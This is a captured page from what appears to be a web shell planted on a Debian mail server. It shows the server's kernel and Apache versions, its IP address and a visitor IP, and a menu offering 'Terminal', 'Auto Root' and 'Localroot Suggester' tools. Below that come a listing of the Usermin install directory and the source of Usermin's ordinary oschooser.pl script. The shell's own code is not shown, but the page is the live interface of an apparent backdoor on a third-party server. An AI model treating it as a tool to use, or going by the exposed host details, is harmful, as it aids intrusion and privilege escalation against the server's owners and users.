Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
usermin /
Delete
Unzip
Name
Size
Permission
Date
Action
at
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
authentic-theme
[ DIR ]
drwxr-xr-x
2026-07-25 20:56
blue-theme
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
changepass
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
chfn
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
commands
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
cron
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
cshrc
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
fetchmail
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
filemin
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
filter
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
forward
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
gnupg
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
gray-theme
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
htaccess
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
htaccess-htpasswd
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
images
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
lang
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
language
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
mailbox
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
mailcap
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
man
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
mysql
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
plan
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
postgresql
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
proc
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
procmail
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
quota
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
schedule
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
shell
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
spam
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
ssh
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
theme
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
tunnel
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
twofactor
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
ulang
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
unauthenticated
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
updown
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
usermount
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
vendor_perl
[ DIR ]
drwxr-xr-x
2026-06-10 18:25
xterm
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
LICENCE
1.48
KB
-rw-r--r--
2026-07-19 16:26
LICENCE.ja
1.62
KB
-rw-r--r--
2026-07-19 16:26
README
1.92
KB
-rw-r--r--
2026-07-19 16:26
WebminCore.pm
9.05
KB
-rw-r--r--
2026-07-19 16:26
acl_security.pl
2.89
KB
-rwxr-xr-x
2026-07-19 16:26
chooser.cgi
7.21
KB
-rwxr-xr-x
2026-07-19 16:28
config-aix
227
B
-rw-r--r--
2026-07-19 16:26
config-cobalt-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-coherent-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-corel-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-debian-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-freebsd
256
B
-rw-r--r--
2026-07-19 16:26
config-generic-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-gentoo-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-hpux
243
B
-rw-r--r--
2026-07-19 16:26
config-irix
284
B
-rw-r--r--
2026-07-19 16:26
config-lib.pl
11.84
KB
-rwxr-xr-x
2026-07-19 16:26
config-macos
260
B
-rw-r--r--
2026-07-19 16:26
config-mandrake-linux
278
B
-rw-r--r--
2026-07-19 16:26
config-msc-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-netbsd
283
B
-rw-r--r--
2026-07-19 16:26
config-open-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-openbsd
241
B
-rw-r--r--
2026-07-19 16:26
config-openmamba-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-openserver
236
B
-rw-r--r--
2026-07-19 16:26
config-osf1
266
B
-rw-r--r--
2026-07-19 16:26
config-redhat-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-slackware-linux
280
B
-rw-r--r--
2026-07-19 16:26
config-sol-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-solaris
417
B
-rw-r--r--
2026-07-19 16:26
config-suse-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-trustix-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-turbo-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-united-linux
264
B
-rw-r--r--
2026-07-19 16:26
config-unixware
286
B
-rw-r--r--
2026-07-19 16:26
copyconfig.pl
4.33
KB
-rwxr-xr-x
2026-07-19 16:28
date_chooser.cgi
2.19
KB
-rwxr-xr-x
2026-07-19 16:28
deb-name
8
B
-rw-r--r--
2026-07-19 16:28
defaultacl
124
B
-rw-r--r--
2026-07-19 16:26
defaulttheme
16
B
-rw-r--r--
2026-07-19 16:26
entities_map.txt
1.47
KB
-rw-r--r--
2026-07-19 16:26
favicon.ico
14.73
KB
-rw-r--r--
2026-07-19 16:26
group_chooser.cgi
7.51
KB
-rwxr-xr-x
2026-07-19 16:28
help.cgi
2.26
KB
-rwxr-xr-x
2026-07-19 16:28
html-editor-lib.pl
17.72
KB
-rw-r--r--
2026-07-19 16:26
index.cgi
5.64
KB
-rwxr-xr-x
2026-07-19 16:28
install-module.pl
1.27
KB
-rwxr-xr-x
2026-07-19 16:28
install-type
4
B
-rw-r--r--
2026-07-19 16:28
javascript-lib.pl
14.69
KB
-rwxr-xr-x
2026-07-19 16:26
lang_list.txt
2.51
KB
-rw-r--r--
2026-07-19 16:26
maketemp.pl
424
B
-rwxr-xr-x
2026-07-19 16:26
mime.types
12.42
KB
-rw-r--r--
2026-07-19 16:26
miniserv-lib.pl
175.51
KB
-rw-r--r--
2026-07-19 16:26
miniserv.pem
2.9
KB
-rw-r--r--
2026-07-19 16:26
miniserv.pl
33.88
KB
-rwxr-xr-x
2026-07-19 16:28
newmods.pl
1.25
KB
-rwxr-xr-x
2026-07-19 16:26
os_list.txt
35.22
KB
-rw-r--r--
2026-07-19 16:26
oschooser.pl
4.55
KB
-rwxr-xr-x
2026-07-19 16:28
pam_login.cgi
4.33
KB
-rwxr-xr-x
2026-07-19 16:28
password_change.cgi
7.02
KB
-rwxr-xr-x
2026-07-19 16:28
password_form.cgi
1.3
KB
-rwxr-xr-x
2026-07-19 16:28
perlpath.pl
571
B
-rwxr-xr-x
2026-07-19 16:28
robots.txt
26
B
-rw-r--r--
2026-07-19 16:26
session_login.cgi
5.11
KB
-rwxr-xr-x
2026-07-19 16:28
setup.sh
27.29
KB
-rwxr-xr-x
2026-07-19 16:26
switch_user.cgi
404
B
-rwxr-xr-x
2026-07-19 16:28
thirdparty.pl
1.73
KB
-rwxr-xr-x
2026-07-19 16:26
uconfig.cgi
1.39
KB
-rwxr-xr-x
2026-07-19 16:28
uconfig_save.cgi
1.46
KB
-rwxr-xr-x
2026-07-19 16:28
ui-lib.pl
123.52
KB
-rwxr-xr-x
2026-07-19 16:26
update-from-repo.sh
14.77
KB
-rwxr-xr-x
2026-07-19 16:26
updateboot.pl
2.37
KB
-rwxr-xr-x
2026-07-19 16:28
uptracker.cgi
2.89
KB
-rwxr-xr-x
2026-07-19 16:28
user_chooser.cgi
7.39
KB
-rwxr-xr-x
2026-07-19 16:28
usermin-init
1.88
KB
-rwxr-xr-x
2026-07-19 16:26
usermin-pam
101
B
-rw-r--r--
2026-07-19 16:26
usermin-pam-osx
243
B
-rw-r--r--
2026-07-19 16:26
usermin-systemd
375
B
-rw-r--r--
2026-07-19 16:26
version
6
B
-rw-r--r--
2026-07-19 16:26
web-lib-funcs.pl
417.23
KB
-rwxr-xr-x
2026-07-19 16:26
web-lib.pl
856
B
-rwxr-xr-x
2026-07-19 16:26
webmin-search-lib.pl
9.47
KB
-rwxr-xr-x
2026-07-19 16:26
webmin_search.cgi
2.63
KB
-rwxr-xr-x
2026-07-19 16:28
Save
Rename
#!/usr/bin/perl # oschooser.pl # Read the list of operating systems and ask the user to choose # an OS and version # auto param: 0 = always ask user # 1 = automatic, give up if fails # 2 = automatic, ask user if fails # 3 = automatic, ask user if fails and if a TTY $| = 1; ($oslist, $out, $auto) = @ARGV; open(OS, "<".$oslist) || die "failed to open $oslist : $!"; while(<OS>) { chop; if (/^([^\t]+)\t+([^\t]+)\t+([^\t]+)\t+([^\t]+)\t*(.*)$/) { push(@list, [ $1, $2, $3, $4, $5 ]); push(@names, $1) if (!$donename{$1}++); $names_to_real{$1} ||= $3; } } close(OS); if ($auto) { # Try to guess the OS name and version if (-r "/etc/.issue") { $etc_issue = `cat /etc/.issue`; } elsif (-r "/etc/issue") { $etc_issue = `cat /etc/issue`; } if (-r "/etc/os-release") { $os_release = `cat /etc/os-release`; } if (&has_command('uname')) { $uname = `uname -a 2>/dev/null`; } foreach $o (@list) { if ("$^O" =~ /MSWin32/ && "$o->[2]" !~ /windows/) { next; } if ($o->[4] && eval "$o->[4]") { # Got a match! Resolve the versions $ver = $o; if ($ver->[1] =~ /\$/) { $ver->[1] = eval "($o->[4]); $ver->[1]"; } if ($ver->[3] =~ /\$/) { $ver->[3] = eval "($o->[4]); $ver->[3]"; } last; } if ($@) { print STDERR "Error parsing $o->[4]\n"; } } if (!$ver) { if ($auto == 1) { # Failed .. give up print "Failed to detect operating system\n"; exit 1; } elsif ($auto == 3) { # Do we have a tty? local $rv = system("tty >/dev/null 2>&1"); if ($?) { print "Failed to detect operating system\n"; exit 1; } else { $auto = 0; } } else { # Ask the user $auto = 0; } } } if (!$auto) { if (0 && &has_command("dialog")) { # call the dialog command to ask for the OS (disabled for now) $cmd = "dialog --menu \"Please select your operating system type from the list below\" 20 60 12"; for($i=0; $i<@names; $i++) { $cmd .= " ".($i+1)." '$names[$i]'"; } $tmp_base = $ENV{'tempdir'} || "/tmp/.webmin"; $temp = "$tmp_base/dialog.out"; system("$cmd 2>$temp"); $osnum = `cat $temp`; $osnum = int($osnum); if (!$osnum) { #unlink($temp); print "ERROR: No operating system selected\n\n"; exit 9; } # call the dialog command to ask for the version $name = $names[$osnum-1]; @vers = grep { $_->[0] eq $name } @list; $cmd = "dialog --menu \"Please select your operating system's version from the list below\" 20 60 12"; for($i=0; $i<@vers; $i++) { $cmd .= " ".($i+1)." '$name $vers[$i]->[1]'"; } system("$cmd 2>$temp"); $vnum = `cat $temp`; $vnum = int($vnum); unlink($temp); if (!$vnum) { print "ERROR: No operating system version selected\n\n"; exit 9; } $ver = $vers[$vnum-1]; } else { # ask for the operating system name ourselves $dashes = "-" x 75; print <<EOF; For Webmin to work properly, it needs to know which operating system type and version you are running. Please select your system type by entering the number next to it from the list below $dashes EOF for($i=0; $i<@names; $i++) { printf " %2d) %-20.20s ", $i+1, $names[$i]; print "\n" if ($i%3 == 2); } print "\n" if ($i%3); print $dashes,"\n"; print "Operating system: "; chop($osnum = <STDIN>); if ($osnum !~ /^\d+$/) { print "ERROR: You must enter the number next to your operating\n"; print "system, not its name or version number.\n\n"; exit 9; } if ($osnum < 1 || $osnum > @names) { print "ERROR: $osnum is not a valid operating system number.\n\n"; exit 10; } print "\n"; # Ask for the operating system version $name = $names[$osnum-1]; print <<EOF; Please enter the version of $name you are running EOF print "Version: "; chop($vnum = <STDIN>); if ($vnum !~ /^\S+$/) { print "ERROR: An operating system number cannot contain\n\n"; print "spaces. It must be like 2.1 or ES4.0.\n"; exit 10; } print "\n"; $ver = [ $name, $vnum, $names_to_real{$name}, $vnum ]; } } # Write the name, version and real name and version to a file open(OUT, ">$out"); print OUT "os_type='",$ver->[2],"'\n"; print OUT "os_version='",$ver->[3],"'\n"; print OUT "real_os_type='",$ver->[0],"'\n"; print OUT "real_os_version='",$ver->[1],"'\n"; close(OUT); # has_command(command) # Returns the full path if some command is in the path, undef if not sub has_command { local($d); if (!$_[0]) { return undef; } local $rv = undef; if ($_[0] =~ /^\//) { $rv = (-x $_[0]) ? $_[0] : undef; } else { foreach $d (split(/:/ , $ENV{PATH})) { if (-x "$d/$_[0]") { $rv = "$d/$_[0]"; last; } } } return $rv; }